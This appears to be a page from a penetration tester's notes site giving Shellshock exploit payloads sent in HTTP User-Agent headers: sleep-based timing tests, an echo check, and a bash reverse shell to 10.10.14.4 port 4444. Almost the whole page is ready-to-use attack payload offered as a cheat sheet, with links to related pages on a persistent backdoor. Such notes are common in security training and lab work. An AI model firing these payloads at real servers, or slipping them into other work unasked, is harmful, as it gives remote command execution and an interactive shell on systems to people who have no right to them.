CtrlK

shellshock

Exploiting shellshock vuln

#blind test (non apache) test response time
User-Agent: () { :; }; sleep 1
User-Agent: () { :; }; sleep 10

#Echo test (apache should print hello)
User-Agent: () { :; }; /bin/echo hello

#reverse shell
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.4/4444 0>&1

PreviousUsing ENV to escape Bad Characters NextNcat Persistent Backdoor

Last updated 4 years ago

Was this helpful?